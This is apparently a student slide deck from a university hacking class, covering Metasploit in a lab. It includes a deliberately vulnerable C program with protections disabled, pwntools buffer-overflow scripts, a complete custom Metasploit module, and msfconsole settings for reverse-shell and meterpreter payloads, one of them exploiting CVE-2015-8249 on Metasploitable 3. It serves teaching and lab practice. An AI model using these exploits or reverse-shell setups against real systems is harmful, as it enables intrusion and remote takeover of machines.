---
# System prepended metadata

title: Hacking Technology - Final Presentation
tags: [' hack', nsysu]

---

---

title: Hacking Technology - Final Presentation
tags: nsysu, hack
description: hacker class final project
slideOptions:
    themem: Moon
    transition: slide
    parallaxBackgroundImage:  "https://i.imgur.com/9MKTZRF.jpg"
    
---

Studying the Metasploit Framework in Depth
===

---

# Metasploit framework

<div class=members>
Group 1<br>
1. B043040006 謝文仁 <br>
2. B043040020 張哲魁 <br>
3. B043040036 滕熙評 <br>
4. B043040043 朱晉廷 <br>
Advisor: 王智弘
</div>

---

# Agenda

- Write your own metasploit module

- Attack Metasploitable 3 - Windows Server 2008

- Backdoor on Android using metasploit



---

# Write your own metasploit module

---

# Abstract

Integrate a hand-written payload into the Metasploit Framework.


Using a buffer overflow as the example: plant a vulnerable program we wrote ourselves on the victim, write the payload for it, and then integrate it into Metasploit.


---


# Environment and tools

- Attacker:
    1. OS: macOS 10.13.6
    2. Metasploit: 5.0.25
- Victim:
    1. OS: Ubuntu 14.04
    2. gcc: 4.8.4
- Network:
    - In the same subnet.
    

---


# Vulnerable Program
A buffer-overflow program that reads from a TCP socket. `sp` is a global buffer (so its address is fixed); `buf` is a 20-byte stack buffer.

```c=1
char sp[1024];
```
```c=48
/* start vulnerable read, ret2shellcode */
printf("shellcode:");
read(cli_fd, sp, 1024);
printf("The shellcode recv is:%s\n", sp);

printf("overflow here:");
char buf[20];

// VULNERABLE PLACE!! The length is 0xffffffff instead of sizeof(buf),
// so input longer than 20 bytes runs past buf and over the saved return address
read(cli_fd, buf, 0xffffffff); 
/* ----- */

printf("the buf recv is:%s\n", buf);
/* end of vulnerable read */
```
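As an added example (not part of the class project's `vuln.c`), here is the bounded counterpart of the vulnerable `read()` above: the length handed to `read()` is derived from the buffer's real size and the result is always NUL-terminated, so the 20-byte stack buffer cannot be overrun regardless of what the peer sends. `recv_bounded`, `read_through_pipe`, the two `demo_*` functions and the guard-word check are hypothetical names and a self-test of my own; the harness feeds constructed input through a pipe instead of a TCP socket so it runs offline.

```c
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Bounded replacement for `read(cli_fd, buf, 0xffffffff)`:
 * reads at most cap-1 bytes into buf, NUL-terminates, and returns the number
 * of bytes stored (or -1 with errno set). The length passed to read() is tied
 * to the caller's real buffer size, so a long message is truncated instead of
 * spilling over the saved return address. (Hypothetical helper, added example.) */
ssize_t recv_bounded(int fd, char *buf, size_t cap)
{
    if (buf == NULL || cap == 0) {
        errno = EINVAL;
        return -1;
    }
    ssize_t n = read(fd, buf, cap - 1);
    if (n < 0) {
        buf[0] = '\0';
        return -1;
    }
    buf[n] = '\0';            /* printf("%s") on the result is now safe */
    return n;
}

/* Test helper: push `len` bytes of constructed input through a pipe and read
 * them back with recv_bounded() into a buffer of `cap` bytes. Stands in for
 * the TCP client socket so the example runs offline. */
static ssize_t read_through_pipe(const char *data, size_t len, char *buf, size_t cap)
{
    int fds[2];
    if (pipe(fds) != 0)
        return -1;
    ssize_t written = write(fds[1], data, len);
    close(fds[1]);
    ssize_t n = (written == (ssize_t)len) ? recv_bounded(fds[0], buf, cap) : -1;
    close(fds[0]);
    return n;
}

/* 100 bytes of 'A' (longer than the 80-byte offset used by the exploit) into a
 * 20-byte buffer followed by a guard word. Returns 1 when at most 19 bytes were
 * stored, the string is NUL-terminated and the guard word is untouched.
 * Member order in the struct is guaranteed; "an overflow would hit the guard"
 * is a practical observation, not a C-standard guarantee. */
int demo_overlong_input(void)
{
    struct { char buf[20]; unsigned int guard; } frame = { {0}, 0xdeadbeefu };
    char input[100];
    memset(input, 'A', sizeof input);              /* constructed overlong input */
    ssize_t n = read_through_pipe(input, sizeof input, frame.buf, sizeof frame.buf);
    return n == 19 && strlen(frame.buf) == 19 && frame.guard == 0xdeadbeefu;
}

/* Ordinary short message: stored in full and NUL-terminated. Returns its length. */
ssize_t demo_short_input(void)
{
    char buf[20];
    const char msg[] = "hello";                     /* constructed short input */
    ssize_t n = read_through_pipe(msg, strlen(msg), buf, sizeof buf);
    return (n >= 0 && strcmp(buf, msg) == 0) ? n : -1;
}

int main(void)
{
    printf("overlong input contained: %s\n", demo_overlong_input() ? "yes" : "no");
    printf("short input stored: %zd bytes\n", demo_short_input());
    return 0;
}
```

Compiled with gcc's defaults (none of the `-fno-stack-protector -z execstack` flags, no suid bit), the binary also keeps the protections the Makefile below switches off; those only make the bug harder to exploit, while the bounded read removes the bug itself.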

----

## Disabled Protections

<p style="color:red" align="center">
Set suid to get root permission. 
</p>

Compile with these flags. 

```Makefile=
SRC=vuln.c 
EXEC=vuln
CC=gcc
CCFLAG=-g -m32 -fno-stack-protector -z execstack -o

all:
	${CC} ${CCFLAG}  ${EXEC} ${SRC}
	sudo chown root ${EXEC}
	sudo chgrp root ${EXEC}
	sudo chmod +s ${EXEC}
clean:
	rm -f ${EXEC}
```

----

## Final Protections

<img src="https://i.imgur.com/FgWy3MN.png" align="center">


----

## Payload - 1
Return to the address of `char sp[1024]` (0x0804a080), which is where the shellcode was placed.

Ruby version:
```ruby=
require 'pwn'
context.arch = 'i386'

z = Sock.new '192.168.56.101', ARGV[0].to_i   # port comes from the command line

# reverse-TCP shellcode (elided); it lands in sp[1024] at 0x0804a080
shellcode = "\x6a\x66\x58\x6a\x01\x5b\x31\xf6 ... "
z.sendline shellcode

address = 0x0804a080    # return address
payload = "a"*80 + p32(address)   # 80-byte offset, then the address in little endian
z.write payload

z.interact
```

----

## Payload - 2
Python version:
```python=
from pwn import *
import sys

context(arch='i386', os='linux')   # asm()/shellcraft need the target architecture

host, port = '192.168.56.101', int(sys.argv[1])
r = remote(host, port)

# shellcode from the pwntools package; it lands in sp[1024] at 0x0804a080
r.sendline(asm(shellcraft.sh()))

address = 0x0804a080  # return address
payload = b"a" * 80 + p32(address)  # bytes, not str: p32() returns bytes in Python 3
r.sendline(payload)

r.interactive()
```

---


# Exploit Result - victim
Shellcode: reverse TCP on port 1337.
The victim, bound on port 8888, will open a backdoor on port 1337.
![](https://i.imgur.com/kPRIPF3.png)

![](https://i.imgur.com/cVs5ggK.png)

----

## Exploit Result - attacker
Attacker: connection succeeded on port 1337 (victim IP = 192.168.56.101)
![](https://i.imgur.com/IXIGkUF.png)

![](https://i.imgur.com/s2wVYUE.png)


---

# Integrate to Metasploit 
- Start writing my own Metasploit module!
- Official template: [Metasploit Github](https://github.com/rapid7/metasploit-framework/wiki/How-to-get-started-with-writing-an-exploit)
- Basically you can just follow that template.

----

## Module functions 1
- A few key functions:
- `initialize()`: where the metadata is placed.
    - The payload, return address and so on can be set per target platform.
    - All other related information goes here too (e.g. License, Name, ...).

----

## Module functions 2
- `exploit()`: the main function of the exploit.
    1. connect 
    2. send payload 
    3. handler
    4. disconnect

----

## Whole Module
```ruby=
##
# This module requires Metasploit
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ManualRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'hacker class ret2shellcode buffer overflow',
      'Description'    => %q|
          This is a module for buffer overflow of a simple program vuln,
          only works on this binary, create for hacker class final project.
      |,
      'Author'         => 'haruna',
      'References'     =>
        [
          [ 'URL', 'https://github.com/scwuaptx/HITCON-Training' ],
        ],
      'Platform'       => 'linux',
      'Payload'        =>
        {
        },
      'Arch'          => [ARCH_X86],
      'Targets'        =>
        [
          [
            'Linux x86',
            {
              'Arch' => ARCH_X86,
              'Ret'      => 0x0804a080
            }
          ]
        ],
      'DefaultTarget'  => 0
    ))
  end


  # Returns that the remote host is always vulnerable
  def check
    return Exploit::CheckCode::Vulnerable
  end

  def exploit

    connect

    print_status("Sending #{payload.encoded.length} byte payload...")

    # send shellcode
    print_status("Sending payload...:" + payload.encoded)
    p = payload.encoded
    sock.put(p)


    # Build the buffer for transmission, return to the shellcode place.
    buf = "A" * 80  # offset = 80 bytes
    buf += [ target.ret ].pack('V') # pack('V'), means 32-bit little endian

    print_status("Sending:" + buf)
    sock.put(buf)

    handler
    disconnect
  end
end
```

---



# Metasploit Result - victim 

The victim is still listening on port 8888 ...
![](https://i.imgur.com/9Dr4oh5.png)

----


## Metasploit Result - attacker 1
Enter msfconsole and initialize settings ...
My module is placed at `exploit/unix/bof1`

| who? | IP | PORT | metasploit |
| ---- | -- | ---- | ------------- |
| Attacker | 192.168.56.1 | 12345 | LHOST / LPORT |
| Victim | 192.168.56.101 | 8888 | RHOST / RPORT | 

----

## Metasploit Result - attacker 2
After setting ... 
```
msf5 exploit(unix/bof1) > show info

       Name: hacker class ret2shellcode buffer overflow
     Module: exploit/unix/bof1
   Platform: Linux
       Arch: x86
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Manual

Provided by:
  haruna

Available targets:
  Id  Name
  --  ----
  0   Linux x86

Check supported:
  Yes

Basic options:
  Name    Current Setting  Required  Description
  ----    ---------------  --------  -----------
  RHOSTS  192.168.56.101   yes       The target address range or CIDR identifier
  RPORT   8888             yes       The target port (TCP)

Payload information:

Description:
  This is a module for buffer overflow of a simple program vuln, only
  works on this binary, create for hacker class final project.

References:
  https://github.com/scwuaptx/HITCON-Training
```

----


## Metasploit Result - attacker 3

Next, set payload ...


We can generate the shellcode directly from a payload in Metasploit, instead of searching the web or using other tools as we had to when writing the exploit by hand. (`msfvenom` would also work.)

----

## Metasploit Result - attacker 4
```shell=
set payload linux/x86/shell/reverse_tcp
```

```
msf5 exploit(unix/bof1) > set payload linux/x86/shell/reverse_tcp
payload => linux/x86/shell/reverse_tcp
msf5 exploit(unix/bof1) > show options

Module options (exploit/unix/bof1):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  192.168.56.101   yes       The target address range or CIDR identifier
   RPORT   8888             yes       The target port (TCP)


Payload options (linux/x86/shell/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.56.1     yes       The listen address (an interface may be specified)
   LPORT  12345            yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux x86
```

----

## Metasploit Result - attacker 5
Finally, exploit!
![](https://i.imgur.com/XjAi7Ij.png)

---

# DEMO

---

# References

1. [HITCON Training](https://github.com/scwuaptx/HITCON-Training)
2. [Module Example](https://taishi8117.github.io/2016/07/24/bof-metasploit/)
3. [Shellcodes](http://shell-storm.org/shellcode/)
4. [Metasploit Github Wiki](https://github.com/rapid7/metasploit-framework/wiki)

---

# Metasploitable3 - windows server 2008

---

# Abstract

Exploit on Metasploitable3 - Microsoft Windows Server 2008
Github Page: [Metasploitable 3](https://github.com/rapid7/metasploitable3)

---

# Metasploitable 3

A VM that comes in two flavours, Ubuntu 14.04 and Windows Server 2008; you choose which one to build.

It ships with a number of vulnerabilities to attack.

---

# Scan for Vulnerabilities

Use `nmap` with `-sV` to determine service info and `-p-` to probe **ALL** ports:

```
$ nmap -sV -p- 192.168.56.103
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-13 00:01 CST
Nmap scan report for 192.168.56.103
Host is up (0.0033s latency).
Not shown: 65516 filtered ports
PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         Microsoft ftpd
22/tcp    open  ssh         OpenSSH 7.1 (protocol 2.0)
80/tcp    open  http        Microsoft IIS httpd 7.5
1617/tcp  open  rmiregistry Java RMI
4848/tcp  open  ssl/http    Oracle GlassFish 4.0 (Servlet 3.1; JSP 2.3; Java 1.8)
5985/tcp  open  http        Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
8020/tcp  open  http        Apache httpd
8022/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1
8027/tcp  open  unknown
8080/tcp  open  http        Oracle GlassFish 4.0 (Servlet 3.1; JSP 2.3; Java 1.8)
8282/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1
8383/tcp  open  ssl/http    Apache httpd
8484/tcp  open  http        Jetty winstone-2.8
8585/tcp  open  http        Apache httpd 2.2.21 ((Win64) PHP/5.3.10 DAV/2)
9200/tcp  open  http        Elasticsearch REST API 1.1.1 (name: Eric Williams; Lucene 4.7)
49153/tcp open  msrpc       Microsoft Windows RPC
49154/tcp open  msrpc       Microsoft Windows RPC
49179/tcp open  rmiregistry Java RMI
49205/tcp open  tcpwrapped
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 268.44 seconds
```

----

## Vulnerabilities 1

We can see that many HTTP ports are open.

Try port 8020, an HTTP service.

<img src="https://i.imgur.com/G6dgyI6.png" width=70% height=70%>

----

## Vulnerabilities 2

- There's a "ManageEngine Desktop Central" version 9 on it.
- A tool for remotely managing Windows desktops.
- Search whether this version is vulnerable or not.

----

## Vulnerabilities 3

- Lucky! Found CVE-2015-8249, [reference at the NIST page](https://nvd.nist.gov/vuln/detail/CVE-2015-8249)

- The flaw is in version 9 of this software: the `computerName` parameter of the `FileUploadServlet` class is not fully validated, which allows a path injection attack through which an attacker can execute code remotely.

----

## Vulnerabilities 4

- Below is the Rapid7 blog post, with a detailed payload write-up: [Blog](https://blog.rapid7.com/2015/12/14/r7-2015-22-manageengine-desktop-central-9-fileuploadservlet-connectionid-vulnerability-cve-2015-8249/)
- Metasploit already has a module for this vulnerability.
- `exploit/windows/http/manageengine_connectionid_write`

---

# Exploit on Metasploit 1

Parameter configuration (`set` takes one option per command):

```shell=
use exploit/windows/http/manageengine_connectionid_write
set payload windows/meterpreter/reverse_tcp
set RHOST 192.168.56.103
set RPORT 8020
set LHOST 192.168.56.1
set LPORT 4444
```

----

## Exploit on Metasploit 2

Full settings:

<img src="https://i.imgur.com/guRwESK.png" width=90% height=90%>

----

## Exploit on Metasploit 3

Exploit! We got a meterpreter shell.

![](https://i.imgur.com/UnhpDgf.png)

---

# Protections

Upgrade the version or apply the patch.

The exploit above no longer works from version 9, build 91093 onward.

If you install a new version: the latest at the moment is version 10.

---

# DEMO


<style> 
.reveal h1{
	text-align: center;
	font-size: 75px;
	margin:auto;
}
.reveal h2{
	font-size: 70px;
}
.reveal .members{
	text-align: center;
}
.reveal p{
	text-align: justify;
}
.markdown-body h1{ text-align: center;}
.markdown-body h2{ text-align: left;}
</style>